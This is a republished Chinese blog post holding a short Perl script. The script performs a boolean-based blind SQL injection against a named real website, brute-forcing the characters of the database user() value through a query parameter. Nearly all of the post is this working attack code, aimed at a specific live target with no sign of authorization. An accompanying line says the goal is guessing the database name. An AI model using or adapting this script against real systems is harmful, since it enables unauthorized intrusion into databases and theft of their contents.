测试一个注入小脚本
Posted FireC@t @ Perl6
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了测试一个注入小脚本相关的知识,希望对你有一定的参考价值。
1 use warnings; 2 use strict; 3 use LWP::Simple; 4 my @result; 5 my $i=1; 6 do{ 7 for(my $count=0;$count <=255;$count++){ 8 my $result = get("http://www.btc918.com//Chart/getJsonData?market=1‘ or ( select if(ascii(substr((select user()),$i,1))=$count,1,0))-- -"); 9 if($result =~ /120464662.8341/){ 10 print "OK!\n"; 11 print chr($count),"\n"; 12 push @result,chr($count); 13 last; 14 } 15 print "Not $count \n"; 16 } 17 $i++; 18 }while($i < 15); 19 print @result,"\n";
主要是猜测当前数据库名称
以上是关于测试一个注入小脚本的主要内容,如果未能解决你的问题,请参考以下文章
安全测试 web安全测试 常规安全漏洞 可能存在SQL和JS注入漏洞场景分析。为什么自己没有找到漏洞,哪么可能存在漏洞场景是?SQL注入漏洞修复 JS注入漏洞修复 漏洞存在场景分析和修复示例(代码片段